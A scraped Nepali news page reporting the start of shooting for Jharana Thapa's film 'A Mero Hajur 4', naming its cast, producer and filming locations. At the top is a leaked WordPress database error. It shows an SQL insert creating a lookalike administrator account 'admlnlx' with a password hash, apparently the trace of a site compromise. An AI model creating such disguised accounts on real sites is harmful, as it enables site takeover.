WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkBWx2p/CJRhDWuAOEmUyM4HKsnDqG/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:42:21', '', 'admlnlx', 'admlnlx')

‘ए मेरो हजुर ४’ को छायांकन सुरु – Gaule Khabar

‘ए मेरो हजुर ४’ को छायांकन सुरु

‘ए मेरो हजुर ४’ को छायांकन सुरु

गाउँले न्युज, काठमाण्डौ । झर्ना थापाद्वारा निर्देशित चलचित्र ‘ए मेरो हजुर ४’को छायांकन सुरु गरिएको छ । आज काठमाण्डौको कार्यविनायक मन्दिरमा पूजा गर्दै चलचित्रको छायांकन सुरु गरिएको हो ।
‘ए मेरो हजुर ४’ चलचित्रको शुभसाइत समारोहमा नायक अनमोल केसी, नायिका सुहाना थापा, कलाकार सलोन बस्नेत, निर्देशक झरना थापा, निर्माता सुनिलकुमार थापाको साथमा चलचित्रको सिंगो यूनिट नै उपस्थित थियो । चलचित्रको केही दृश्य खिचेर आजै पोखरा जाने निर्देशक झरना थापाले जानकारी दिइन् ।

चलचित्रका निर्माता सुनिल कुमार थापाका अनुसार चलचित्रको छायांकन पोखरा, काठमाण्डौ, ललितपुरका साथै यूरोप र ओमानमा पनि गरिने छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका